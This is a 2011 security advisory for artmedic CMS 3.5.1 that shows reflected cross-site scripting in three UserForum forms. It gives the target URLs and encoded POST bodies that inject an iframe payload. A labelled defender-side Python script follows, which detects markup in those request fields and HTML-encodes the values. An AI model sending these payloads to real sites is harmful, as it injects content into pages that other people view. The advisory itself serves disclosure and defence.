# Exploit Title: Cross Site Scripting artmedic CMS 3.5.1 UserForum
# Date: 18.08.2011
# Author: Sony
# Software Link: http://www.artmedic-phpscripts.de/
# Version: artmedic CMS 3.5.1

#Proof of concept: http://st2tea.blogspot.com/2011/08/cross-site-scripting-artmedic-cms-351_18.html

..................................................................

1. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=passwort

Enter our code in the E-Mailadresse field: < iframe src="http://xssed.com" > and press the Passwort zusenden button.

#request#

POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword

POST /index.php?page=forumindex&f=2&i=forum_index&fid=sendpassword

forum_useremail=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+zusenden

2. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmelden

Enter our code in the Benutzername and Benutzerpasswort fields: < iframe src="http://xssed.com" > and press the button.

#request#

POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=abmeldenaction

forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_userpasswort=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Benutzer+l%F6schen

3. http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepass

Enter our code in the Bisheriges Passwort, Neues Passwort and Benutzername fields: < iframe src="http://xssed.com" > and press the button.

#request#

POST http://www.artmedic-phpscripts.de/index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction

POST /index.php?page=forumindex&f=2&i=forum_index&fid=changepassaction

passold=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&passnew=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&forum_username=%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E&Submit=Passwort+%E4ndern
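
Added example (not part of the original advisory and not artmedic code): a defender-side check that decodes the three request bodies listed above, reports which form fields carry HTML markup, and shows the HTML-encoded form a page should echo instead of the raw value. The function names and the markup regex are assumptions made for this example; ISO-8859-1 decoding is chosen because the Submit values use %F6 and %E4 for the umlauts.

```python
import html
import re
from urllib.parse import parse_qsl

# Request bodies copied from the three requests in the advisory, keyed by fid.
IFRAME = "%3Ciframe+src%3D%22http%3A%2F%2Fxssed.com%22%3E"
BODIES = {
    "sendpassword": f"forum_useremail={IFRAME}&Submit=Passwort+zusenden",
    "abmeldenaction": f"forum_username={IFRAME}&forum_userpasswort={IFRAME}"
                      "&Submit=Benutzer+l%F6schen",
    "changepassaction": f"passold={IFRAME}&passnew={IFRAME}"
                        f"&forum_username={IFRAME}&Submit=Passwort+%E4ndern",
}

# Heuristic (assumption): start of an HTML tag or comment, e.g. "<iframe", "</b", "<!--".
MARKUP = re.compile(r"<\s*[/!]?\s*[A-Za-z]|<!--")


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body into (name, value) pairs.

    latin-1 is used because the forum submits single-byte umlauts (%F6 = ö);
    decoding those as UTF-8 would turn them into replacement characters.
    """
    return parse_qsl(body, keep_blank_values=True, encoding="latin-1")


def suspicious_fields(body):
    """Names of fields whose decoded value contains HTML markup."""
    return [name for name, value in decode_form(body) if MARKUP.search(value)]


def render_safe(value):
    """HTML-encode a user-supplied value before echoing it into a page."""
    return html.escape(value, quote=True)


def scan(bodies):
    """Map each forum action to the list of fields that carried markup."""
    return {action: suspicious_fields(body) for action, body in bodies.items()}


if __name__ == "__main__":
    for action, fields in scan(BODIES).items():
        print(f"fid={action}: markup in {fields}")
    email = dict(decode_form(BODIES["sendpassword"]))["forum_useremail"]
    print("raw    :", email)
    print("encoded:", render_safe(email))
```
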